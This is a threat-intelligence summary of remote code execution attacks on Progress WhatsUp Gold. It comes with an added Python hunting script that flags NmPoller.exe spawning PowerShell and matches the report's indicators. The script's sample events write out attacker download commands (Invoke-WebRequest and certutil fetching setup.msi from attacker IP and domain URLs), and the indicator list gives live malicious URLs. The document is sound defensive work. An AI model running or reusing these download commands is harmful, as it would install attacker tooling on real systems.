Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities
Sept. 18, 2024, 9 a.m.
Description
Trend Micro researchers have observed remote code execution attacks against Progress WhatsUp Gold since August 30, 2024 that abuse the product's Active Monitor PowerShell Script feature. The attacks possibly leveraged CVE-2024-6670 and CVE-2024-6671, two SQL injection vulnerabilities that Progress patched on August 16; the first intrusions followed publication of a proof-of-concept exploit almost immediately, which suggests that some organizations had not yet been able to apply the fix. Once inside, the attackers created malicious Active Monitor scripts that the polling service NmPoller.exe executed through PowerShell, and used them to download and install remote access tools (Atera Agent, Radmin, SimpleHelp, Splashtop) in an attempt to gain persistence. Recommended mitigations are to restrict access to the WhatsUp Gold web interface and services, apply the patches immediately, and monitor process creation events on WhatsUp Gold servers, in particular NmPoller.exe spawning PowerShell or other script interpreters.
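The following Python script is an added example (not Trend Micro's or Progress's code) showing how the monitoring recommendation above can be turned into a hunt over exported process-creation events. It reads JSON lines with Sysmon Event ID 1 style fields (ParentImage, Image, CommandLine, Hashes), flags NmPoller.exe spawning a script interpreter, and matches command lines and file hashes against the indicators listed on this page. The sample events, the WhatsUp Gold install path, the set of interpreters the poller should not spawn and the download-verb heuristic are constructed assumptions for the example; tune them to your environment.

```python
"""Hunt for the NmPoller.exe -> PowerShell pattern in exported process-creation events.

Added example, not part of the original report. Event format assumed: one JSON
object per line with Sysmon Event ID 1 style fields (RecordId, ParentImage,
Image, CommandLine, Hashes).
"""
import json
import re
from urllib.parse import urlparse

# Indicators taken from the report's Indicators section.
IOC_SHA256 = {
    "f1c68574167eaea826a90595710e7ee1a1e75c95433883ce569a144f116e2bf4",
    "992974377793c2479065358b358bb3788078970dacc7c50b495061ccc4507b90",
    "6daa94a36c8ccb9442f40c81a18b8501aa360559865f211d72a74788a1bbf3ce",
}
IOC_IPS = {"185.123.100.160", "45.227.255.216"}
IOC_HOSTS = {"fedko.org"}

# NmPoller.exe runs Active Monitor scripts (from the report). The interpreters it
# should not normally spawn and the download verbs are assumptions of this example.
POLLER = "nmpoller.exe"
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
DOWNLOAD_HINTS = ("invoke-webrequest", "iwr ", "downloadfile", "downloadstring",
                  "start-bitstransfer", "msiexec", "certutil")

URL_RE = re.compile(r"https?://[^\s'\"<>;]+", re.IGNORECASE)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def sha256_of(ev: dict) -> str:
    """Extract the SHA256 from a Sysmon 'SHA256=...,MD5=...' Hashes field."""
    for part in ev.get("Hashes", "").split(","):
        algo, _, value = part.partition("=")
        if algo.strip().upper() == "SHA256":
            return value.strip().lower()
    return ""


def analyze_event(ev: dict) -> list:
    """Return the reasons this process-creation event is suspicious (empty if none)."""
    reasons = []
    parent = basename(ev.get("ParentImage", ""))
    image = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    low = cmd.lower()

    # Rule 1: the poller spawning a script interpreter (the abuse described in the report).
    if parent == POLLER and image in SCRIPT_HOSTS:
        reasons.append(f"{POLLER} spawned {image}")
        if any(hint in low for hint in DOWNLOAD_HINTS):
            reasons.append("script run by the poller contains a download/install verb")

    # Rule 2: command line references a known C2/download host (URL host or bare IP).
    hits = set()
    for url in URL_RE.findall(cmd):
        host = (urlparse(url).hostname or "").lower()
        if host in IOC_IPS or host in IOC_HOSTS:
            hits.add(host)
    for ip in IP_RE.findall(cmd):
        if ip in IOC_IPS:
            hits.add(ip)
    for host in sorted(hits):
        reasons.append(f"command line references known IOC {host}")

    # Rule 3: the executed image is one of the reported payload hashes.
    if sha256_of(ev) in IOC_SHA256:
        reasons.append("image SHA256 matches a known IOC")
    return reasons


def hunt(jsonl: str) -> list:
    """Return (RecordId, reasons) for every event that triggers at least one rule."""
    findings = []
    for line in jsonl.splitlines():
        if line.strip():
            ev = json.loads(line)
            reasons = analyze_event(ev)
            if reasons:
                findings.append((ev.get("RecordId"), reasons))
    return findings


# Constructed sample events (install path and file names are assumptions, not from the report).
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"RecordId": 101, "ParentImage": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "
                    "\"Invoke-WebRequest http://45.227.255.216:29742/ddQCz2CkW8/setup.msi "
                    "-OutFile C:\\Windows\\Temp\\setup.msi\"",
     "Hashes": "SHA256=0000000000000000000000000000000000000000000000000000000000000000"},
    {"RecordId": 102, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
     "CommandLine": "\"C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\NmPoller.exe\""},
    {"RecordId": 103, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Service -Name 'Ipswitch*'"},
    {"RecordId": 104, "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\Temp\Remote.exe", "CommandLine": "C:\\Windows\\Temp\\Remote.exe",
     "Hashes": "SHA256=f1c68574167eaea826a90595710e7ee1a1e75c95433883ce569a144f116e2bf4"},
    {"RecordId": 105, "ParentImage": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c certutil -urlcache -f https://fedko.org/wp-includes/ID3/setup.msi "
                    "C:\\Windows\\Temp\\setup.msi"},
])

if __name__ == "__main__":
    for record_id, reasons in hunt(SAMPLE_EVENTS):
        print(record_id, "|", "; ".join(reasons))
```

Rule 1 is the high-value signal: a monitoring poller has no legitimate reason to launch cmd.exe or PowerShell with a download cradle, so it stays useful after the listed IPs and hashes rotate. Rules 2 and 3 only catch this campaign's known infrastructure and payloads and should be treated as a bonus, not as the detection.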
Date
Published: Sept. 18, 2024, 8:29 a.m.
Created: Sept. 18, 2024, 8:29 a.m.
Modified: Sept. 18, 2024, 9 a.m.
Indicators
f1c68574167eaea826a90595710e7ee1a1e75c95433883ce569a144f116e2bf4
992974377793c2479065358b358bb3788078970dacc7c50b495061ccc4507b90
6daa94a36c8ccb9442f40c81a18b8501aa360559865f211d72a74788a1bbf3ce
185.123.100.160
45.227.255.216
https://fedko.org/wp-includes/ID3/setup.msi
http://45.227.255.216:29742/ddQCz2CkW8/setup.msi
http://185.123.100.160/access/Remote
Attack Patterns
Splashtop Remote
SimpleHelp Remote Access
Radmin
Atera Agent
T1505.003
T1059.001
T1571
T1105
T1543
T1190
T1133
T1078
CVE-2024-6671
CVE-2024-6670
CVE-2024-4885